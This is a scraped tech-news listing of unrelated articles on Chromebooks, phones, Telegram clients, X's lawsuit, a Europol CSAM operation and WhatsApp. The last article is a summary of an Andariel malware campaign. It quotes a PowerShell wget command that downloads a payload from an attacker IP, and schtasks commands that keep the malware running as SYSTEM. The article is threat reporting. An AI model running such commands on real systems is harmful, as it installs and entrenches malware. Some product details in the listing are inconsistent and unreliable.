The ChromeOS 119 update makes it easy to install Steam games

[ad_1]

The ChromeOS 119 stable update has officially been released for compatible Chromebooks. The new OS upgrade makes it easier to install games from the Steam gaming platform, apart from a few new features. In addition, the stable version of ChromeOS 119 comes with a handful of improvements for the Google Drive synchronization feature. The new update arrives almost a month after ChromeOS 118 was released with new features like touch-on security and more, according to a new report.

The ChromeOS 119 stable update brings Steam gaming to the masses

Chromebook users were already able to install and play compatible games on their devices. However, they had to switch their computer to the developer channel, apart from enabling experimental features and more. The new ChromeOS version has a dedicated Steam icon inside the app drawer. This makes it easier to install games from the popular gaming platform.

The Steam installer will only work on devices that Google has deemed capable of running the platform. On a compatible Chromebook, the users can click on the Steam icon in the app drawer to run the installer. Once Steam is installed, you’ll insert your credentials to log in and install some games to test the limits of your Chromebook.

It’s worth noting that not all games available on the Steam platform are compatible with Chromebooks. Your computer is definitely going to struggle with modern AAA titles. Games like Counter Strike Source will run really well, but you may face lag and frame drops with Counter Strike 2.

The ChromeOS 119 update doesn’t come with the Steam application pre-installed. It is just a shortcut to the Steam installer in the app drawer of your Chromebook, not the fully installed version.

ChromeOS 119 also comes with the Google Drive sync feature

In addition to the Steam installer, the ChromeOS 119 update brings the new Google Drive sync feature for Chromebook Plus models. Chromebook Plus users can now synchronize all of their Google Drive files for offline access. This feature was announced last month as an exclusive feature for Chromebook Plus devices. It will make it much easier to work on a Chromebook, even if it is not connected to any network.

The ChromeOS 119 update also brings features like saving Tab Groups, Privacy Hub controls for camera & microphone access, and more. The update is rolling out to all compatible Chromebooks in a phased manner, so not everyone will get it right away.

Top 5 Best Telegram Client Apps for Android

0
[ad_1]

Ranked and described the functionality of the top 5 best Telegram client applications for Android.

Telegram messenger is gaining popularity, and the number of its users is growing every day. While some users are satisfied with the already included features in the main application, others purchase a Premium version of their favourite messenger, and others have long used the application client Telegram and enjoy the new features of their favourite application.

Below is the rating of 5 Telegram messenger client apps for Android

Nicegram

What is the Nicegram app? It is one of the most popular Telegram client apps. The app is open source, so you can convince yourself that it is safe. With Nicegram you can get unlocking features for chats and channels, translate messages from a foreign language, forward messages anonymously, add tabs and folders, group chats, create multiple accounts, and view chats without a “read” mark.

Telegram X

We would like to note that it is better to install the beta version of the application, to begin with, as the application has not been updated for a long time. In this messenger you can change the settings of the appearance of the application, also Telegram X has a very clear interface. This client app contains the following features: traffic saving when uploading videos and photos, uploading and sending messages is faster than in the official Telegram app.

iMe Messenger

This is a popular app among Android platform users. The app includes many features: a cryptocurrency wallet, sorting chats by topic, a section with music, translating messages from a foreign language right in the chat, blocking selected people to not seeing messages from them, and removing text from photos and image descriptions. You can also use iMe Messenger to convert voice messages to text, and quickly search for GIF images to send in chats.

Graph Messenger

A popular application for those who need privacy when using Messenger. In Graph Messenger developers have included the following features: change your voice when sending voice messages, create and login 100 active accounts at a time, hide chats and channels, chronological display of messages from channels on one page, the ability to edit images directly in the chat, auto-replies for certain contacts directly in the chat.

 Vidogram

This is one of the best Telegram client apps for exploring the content of chats and channels you are subscribed to. With Vidogram you can compile a single news feed from all the channels you are subscribed to, the show history can be in chronological order.

The app also has built-in IPTV, which works very well, so you can watch entertainment, sports and other channels without leaving Vidogram. The app also has features for music lovers: you can form a playlist and listen to music in the app. From the external changes: the user can create animated themes and play online games.

Thus, there are many client applications of the official Telegram app for Android. They differ from each other in terms of functionality, for example, in many you will find the ability to translate messages from another language right in the chat application.

However, there are also applications with exclusive features, for example, the option to change your voice when sending voice messages. In any case, to select the most convenient and functional application, you should try to install several messengers so that you will be delighted with the new icon on your smartphone.

Galaxy A25 5G launch date revealed, arrives in December

0
[ad_1]

Earlier this month, we exclusively revealed the official renders and key specs of Samsung’s upcoming mid-range smartphone, the Galaxy A25 5G. Several other leaks have followed since, while the device picked up necessary regulatory certifications. The company also went on to publish an official support page for the handset. We might finally have a launch date too.

Galaxy A25 5G tipped to launch in early December

According to WinFuture, multiple Swiss online retailers have already listed the Galaxy A25 5G on their websites. The new mid-range handset is expected to go on sale in the country between December 7 and December 19. While it is unclear whether the phone will see a global release next month, we do have an idea about its pricing structure. In Switzerland, the device carries a price tag of CHF279. This should mean a sub-$300 starting price in the US.

For this money, you are getting a decent mid-range smartphone powered by Samsung‘s in-house Exynos 1280 chipset. It is a 5nm processor with a maximum CPU speed of 2.4GHz. The Korean firm will sell the device in 6GB+128GB and 8GB+256GB variants, with the latter costing more. You get support for microSD cards of up to 1TB capacity on both variants, so storage should not be an issue.

The Galaxy A25 5G sports a 6.5-inch Super AMOLED display with an FHD+ resolution (2340×1080 pixels) and a 120Hz refresh rate. All of this promises a smooth user experience as long as the phone isn’t pushed to its limits. The 50MP primary rear camera has an f/1.8 aperture and supports OIS (optical image stabilization), so photos and videos should come out fine too.

Samsung has paired the main camera with an 8MP ultrawide lens featuring an f/2.2 aperture and a 120-degree field of view. A “pointless” 2MP macro camera is also found on the back. The selfie shooter is reportedly a 13MP sensor, though our sources have hinted at the possibility of a 32MP selfie camera for the Galaxy A25 5G. We will have to wait for the official confirmation on that.

The 3.5mm headphone jack is still around

Samsung has removed the 3.5mm headphone jack from its pricier phones but it is still a thing in low-cost handsets. The Galaxy A25 5G will feature the audio jack. Other known specs include a 5,000mAh battery, 25W fast charging, NFC, Bluetooth, Wi-Fi, a side-mounted fingerprint scanner, IP67 dust and water resistance, and dual-SIM support with 5G connectivity. The device will run Android 14 and One UI 6.0 out of the box. It should get updates up to Android 18. Stay tuned for the official launch in a few weeks.

X sued Media Matters after “misleading” report caused ad losses

0
[ad_1]

X, formerly Twitter, has sued non-profit media watchdog group Media Matters for America after a report from the organization led to a brand exodus. Several companies have pulled ads from the social media platform after Media Matters reported last week that the firm “has been placing ads for major brands…next to content that touts Adolf Hitler and his Nazi Party.” X CEO Linda Yaccarino called the report “misleading and manipulated.”

X takes Media Matters to court over a “misleading” report

In its report, Media Matters provided several examples of ads from companies like Apple, Oracle, Xfinity, and IBM appearing on pro-Hitler, Holocaust denial, white nationalist, pro-violence, and neo-Nazi accounts or pro-Hitler posts. This is despite Yaccarino’s assurance that brands are “protected from the risk of being next to toxic posts on the platform” and that the firm is committed to “combating antisemitism.”

Media Matters also targeted X owner Elon Musk who recently endorsed an antisemitic conspiracy theory. He called a post attacking Jewish people the “actual truth.” Following these events, many companies have stopped advertising on X, including Apple, its biggest advertiser. Disney, IBM, Lionsgate, Paramount Global, NBCUniversal, and Warner Bros. Discovery are a few other big names that have pulled ads from the platform.

Following this brand exodus, Musk threatened to sue Media Matters. X has now followed up with a formal lawsuit against the non-profit. In its complaint, the firm said this is “a blatant smear campaign” from Media Matters to drive advertisers from X. The organization has “falsely portrayed” X as an unsafe platform for advertisers for the past several years, it alleged.

“Media Matters has manipulated the algorithms governing the user experience on X to bypass safeguards and create images of X’s largest advertisers’ paid posts adjacent to racist, incendiary content, leaving the false impression that these pairings are anything but what they actually are: manufactured, inorganic, and extraordinarily rare,” part of the complaint reads (via The Verge).

Yaccarino says this is a temporary pause from advertisers

According to X, Media Matters manufactured ads next to pro-Hitler posts using some clever tactics. It created an account that exclusively followed major brands and extremist content. Then, the organization started “endlessly scrolling and refreshing its unrepresentative, hand-selected feed” until it saw the desired result. “Media Matters chose to maliciously misrepresent the X experience with the intention of harming X and its business,” the firm said.

Yaccarino provided further proof that Media Matters manipulated X algorithms. According to the X CEO, “not a single authentic user on X saw IBM’s, Comcast’s, or Oracle’s ads next to the content in Media Matters’ article. Only two users saw Apple’s ad next to the content, at least one of which was Media Matters. Data wins over manipulation or allegations.”

In a note to employees, Yaccarino said that advertisers have temporarily paused investments because of the misleading and manipulated article. “I had several really good conversations today,” she told employees at a separate all-hands after the lawsuit, Fortune reports. X appears confident that it has a strong case against Media Matters and that advertisers will be back soon.

Texas Attorney General Ken Paxton has also opened an investigation into Media Matters for “potential fraudulent activity” after X complained that the non-profit manipulated data to harm its business. “We are examining the issue closely to ensure that the public has not been deceived by the schemes of radical left-wing organizations…” Paxton said in a press release.

Europol Busts Major Online CSAM Racket in Western Balkans

0
[ad_1]

Authorities have seized electronic devices and malicious images while identifying 39 suspects, arresting 3 individuals, and rescuing two child victims.

In recent years, Europol has supported law enforcement agencies around the world to identify and arrest hundreds of suspects and to rescue thousands of child victims. To further intensify its efforts to combat online child sexual abuse, Operation MOZAIK 2023 was launched to identify and arrest people utilizing online forums and messaging apps to share child sexual abuse material (CSAM) online.

Europol’s press release states that law enforcement authorities in the Western Balkan region have identified 39 suspects from eight countries. The suspects were involved in a major child sexual abuse racket operating in the Western Balkan region.

Europol supervised this operation, whereas the Slovenian National Police led it. It involved cooperation from agencies in Albania, Bosnia and Herzegovina, Kosovo, Montenegro, North Macedonia, and Serbia (Slovenia, Croatia and Hungary).

A series of law enforcement actions was conducted between 6 and 17 November 2023. During the operation, 41 raids were conducted, and investigators uncovered a vast network of individuals engaged in the sharing/distribution of CSAM.

Authorities managed to seize around 200 items (computers, memory cards, computer servers, and mobile phones) containing images/videos of CSAM were confiscated. Three suspects were already under arrest for crimes involving child sexual abuse.

The identification of 39 suspects marks a breakthrough and an indication of the operation’s success because, in addition to identifying the suspects, the operation also led to the rescue of two child victims. They will receive support to recover from the abuse, whereas the suspects will be tried in court for their crimes.

The Slovenian National Police press release clarified that there are no Slovenian children among the victims. Additionally, the investigation has not confirmed that the suspects themselves created the material under investigation or were involved in physically and sexually abusing children.

“However, with the information collected so far, it was established that some suspects paid for child sexual abuse material with cryptocurrencies, and also operated on the dark web (in the darknet network),” explained the statement.

The operation is the latest in a series of Europol-coordinated actions to combat online child sexual abuse. Earlier in November, Hackread reported that a 36-year-old Lawton, Oklahoma resident, Austen Peppers, was sentenced to over 21 years in prison for advertising and distributing CSAM on the dark web.

Now, the agency has launched a crackdown against CSAM distributors in the Western Balkan region, which is a prioritized region for Europol under its EMPACT framework (European Multidisciplinary Platform Against Criminal Threats) that facilitates cross-border cooperation between law enforcement agencies in Slovenia, Croatia, Hungary, and Europol.

Online child sexual abuse is a global problem that requires a global response. The perpetrators of such heinous crimes have been using advanced methods to make money, such as using artificial intelligence (AI) to produce CSAM.

A recent report by the Internet Watch Foundation (IWF) revealed a significant rise in cybercriminals utilizing generative AI platforms to produce child sexual abuse material (CSAM). This growing preference for deep fake content, particularly involving minors, raises serious concerns due to its potential for widespread harm and the ease with which sex offenders can create and disseminate such imagery.

ASUS ROG Phone 8 Ultimate coming with Snapdragon 8 Gen 3 & 24GB of RAM

0
[ad_1]

The ASUS ROG Phone 8 Ultimate will be the most powerful smartphone in the lineup, and it was just confirmed it will include the Snapdragon 8 Gen 3 and 24GB of RAM.

The ASUS ROG Phone 8 Ultimate will feature the Snapdragon 8 Gen 3 & 24GB of RAM

This confirmation comes from Geekbench, a benchmarking tool. The phone appeared with the ASUS_AI2401_D model number. The phone managed to score 2,235 points in the single-core, and 7,098 points in the multi-core test. That is impressive, and in line with what Qualcomm shared for the Snapdragon 8 Gen 3.

What this benchmark also reveals is that the phone will ship with Android 14 out of the box. On top of it, you’ll get ASUS’ ROG UI, of course. For those of you who are out of the loop, this is ASUS’ upcoming gaming smartphone.

ASUS has been releasing its gaming smartphones as part of the ROG brand for quite some time now. It had a compelling lineup of devices to offer earlier this year, and the same will be the case next year.

Its charging speed was also revealed recently

It’s interesting that all this info is coming so early, though. The phone’s charging speed was recently revealed, and now it surfaced on Geekbench. It is not expected to arrive until Q2 next year, however.

The ASUS ROG Phone 6 series launched in July 2022, while the ROG Phone 7 series arrived in April last year. So let’s assume that the ROG Phone 7 series will launch in April next year, or at least close to it.

The ASUS ROG Phone 8 Ultimate will be the most powerful smartphone in the series. This year’s model includes 16GB of RAM, while the ROG Phone 8 Ultimate will bump that up to 24GB of RAM.

Do note that the 24GB RAM model could end up being exclusive to China, we’ll see. The ASUS ROG Phone 8 Ultimate will make its way to global markets, though.

Tech CEOs to testify before Senate over online child sexual exploitation

0
[ad_1]

The US lawmakers are more concerned about children’s safety than ever. They first introduced the Kids Online Safety Act (KOSA) in May 2023 as a guide to protect children on social platforms. Now, the US Senate wants to hold a hearing over online child sexual exploitation by subpoenaing tech CEOs.

CEOs of X (formerly Twitter), Discord, and Snap are subpoenaed to testify before the Senate Judiciary Committee on December 6. Lawmakers also expect Meta CEO Mark Zuckerberg TikTok’s Shou Zi Chew to participate in the hearing voluntarily.

According to committee chair Sen. Dick Durbin (D-IL) and ranking member Sen. Lindsey Graham (R-SC), the Big Tech’s failure to protect children can not go unanswered. “I’m hauling in Big Tech CEOs before the Senate Judiciary Committee to testify on their failure to protect kids online,” Durbin added.

X, Snap, and Discord CEOs will appear before the Senate

The committee further noted that X and Discord refused to accept subpoenas on behalf of their CEOs. So, the committee has to use the US Marshals Service. In response, Wifredo Fernandez, head of US and Canada government affairs at X, said they’re working in “good faith” to participate in the Senate hearing. Fernandez also said they’ll community their availability today.

A Discord spokesperson told Engadget that protecting users, especially minors, is “central to everything” at the company. “We have been actively engaging with the Committee on how we can best contribute to this important industry discussion,” the spokesperson added. Discord also announced its availability to testify before the Senate Judiciary Committee.

It remains to be seen if Meta and TikTok CEO will appear before the Senate. Both platforms have already come under fire over children’s safety. Arturo Béjar, a former director of engineering for Protect and Care at Facebook, has recently testified before Congress about the company’s practices to protect minors. He blasts the tech firm over its policies toward children, saying Meta can’t be trusted with our children. Meta policies have always been controversial. The firm has just said that app stores should be responsible for age verification.

WhatsApp is rolling out an email verification feature with the latest iOS app update

0
[ad_1]

With a staggering user base of over 2.7 billion globally, WhatsApp consistently introduces new features and updates to try and keep its vast user community satisfied. The recent development in this regard is the widespread rollout of an email verification feature, a move previously hinted at by the Meta-owned app.

As reported by WABetaInfo, WhatsApp is currently pushing an update that enables users to link their accounts to an email address. This functionality, which allows users to verify their accounts via email rather than SMS, had initially been tested in a beta version and is now rolling out to all iOS users.

The 23.24.70 update for iOS is now available on the App Store, and although the official changelog doesn’t provide detailed information about the new features included, it looks like WhatsApp is widely rolling out the email verification feature.

It’s essential to note that this option doesn’t replace SMS verification but serves as an alternative. This can prove useful in scenarios where users find themselves in areas without cellular coverage, for example, and still need to log in to their WhatsApp accounts.

To add an email address to your account, navigate to the Your Profile tab, select the Account menu, and tap on Email Address. WhatsApp emphasizes that the provided email address is solely used for account access and remains invisible to other users.

For users who haven’t received the feature yet, it’s anticipated that accounts will gradually receive the update over the next few weeks. The email verification feature is currently accessible to iOS users who install the latest WhatsApp update from the App Store. Ensure you’ve updated to this version if you want to explore the new feature. The feature might soon come to Android, too.

Additionally, users may notice a redesigned interface featuring a new green color. In other news, just recently, WhatsApp has introduced voice chats for large groups on iOS and Android and a new privacy feature allowing users to hide their IP address.

Pixel 8 display can get brighter than Google stated it could

0
[ad_1]

The Google Pixel 8 and Pixel 8 Pro have launched with Actua and Super Actua displays, respectively. Google said that the two phones can reach 2,000 and 2,400 nits of brightness, respectively. Well, it seems like the company might have undersold the Pixel 8 a bit, as the phone’s display can get brighter than initially stated.

The Google Pixel 8 display can get brighter than Google promised

Folks over at XDA Developers revealed that. Now, Google uses a measurement of “5% on-pixel ratio” in order to measure the brightness on these displays. In other words, it only measures a small percentage of the display.

Also, do note that in real life, you won’t really see the Pixel 8 jump up to 2,000 nits brightness, nor the Pixel 8 Pro jump to 2,400 nits. Well, unlike you’re running HDR content, actually. In regular use, that won’t happen. That’s common for smartphones.

Google did say that the Pixel 8 can reach 1,400 nits brightness in regular use, and the Pixel 8 Pro go up to 1,600 nits. Well, based on what XDA Developers shared, the Pixel 8 can actually jump up to 1,600 nits. That basically means Google undersold the phone’s capability a bit.

That goes for fullscreen brightness, by the way. In other measurements, the display can get even brighter. If you check out the table below, you’ll see a huge difference compared to the Pixel 7. The Pixel 7 wasn’t all that impressive when it comes to display brightness, so… it’s great to see a new display on the Pixel 8.

Pixel 8 XDA Developers deep dive

It gets even brighter than the Pixel 8 Pro panel

What’s interesting is that the Pixel 8 even outperformed the Pixel 8 Pro in this regard. XDA Developers also published their findings for the Pixel 8 Pro about a week ago. The Pixel 8 display actually gets brighter than the Pixel 8 Pro in their tests, slightly.

One thing to note is that the Pixel 8 can reach 1,600 nits only when the Smooth Display option is turned on. In their words, only when you allow the phone to run at 120Hz, which is interesting.

Hackers Exploit Asset Management Program to Deploy Malware

0
[ad_1]

The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has been previously discovered to be in a relationship with the Lazarus group.

The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.

The group’s recent targets were Log4Shell and Innorix agents, which were targeted for attacking several corporate sectors in South Korea. In another case, the MS-SQL server was also identified to be targeted for malware attack.

The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Hackers Exploit Asset Management Program

Initial Access

In one case, an asset management program was targeted, which was identified with several logs.

This program was installed with Andariel group’s malware, which used the below PowerShell command for downloading the malware by using the mshta.exe process.

Powershell command used (Source: AhnLab)
Powershell command used (Source: AhnLab)

PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Malware Used in Attacks

Some of the most used backdoors installed were TigerRAT, Black RAT, and NukeSped.

However, in recent attacks, an Open source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered.

TigerRAT

This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

This backdoor has an authentication process during initial communications, making it different from other backdoors.

Golang Downloader

This malware contains a simple structure that connects the C&C server and installs an additional payload.

It also used Base64 encryption during its communication with the C2 server. This Golang downloader is used to download and install malware like TigerRAT and variants of NukeSped.

NukeSped Variants, Black RAT, and Lilith RAT

NukeSped is a backdoor receiving commands from the C2 server and controlling the affected system.

This backdoor sends a packet using the POST method during initial communications with the C2 server and also sends the results of the executed commands to the server using a GET method.

Black RAT is another backdoor developed in the Go Language which doesn’t have any source code information that was used in recent attacks.

However, Lilith RAT was an open-source malware that was developed in C++ and published on GitHub.

It consists of various features that can be used to perform remote code execution, maintain persistence, and auto-delete.

Post Infection

Once the backdoors have been installed on the system, they execute the following commands to register them on the task scheduler to maintain persistence.

> schtasks /delete /tn “microsoft\******” /f
> schtasks /create /tn “microsoft\******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru system
> schtasks /run /tn “microsoft\windows\mui\route”

Post this; additional commands are used to look up the information on the infected system and remove the downloader malware or terminate other processes.

The backdoor also collects information and offers the capabilities for a threat actor to download and use hacking tools for stealing credentials or password recovery.

A complete report about this threat actor and the malware used has been published by AhnLab, providing detailed information about the source code, commands, and others.
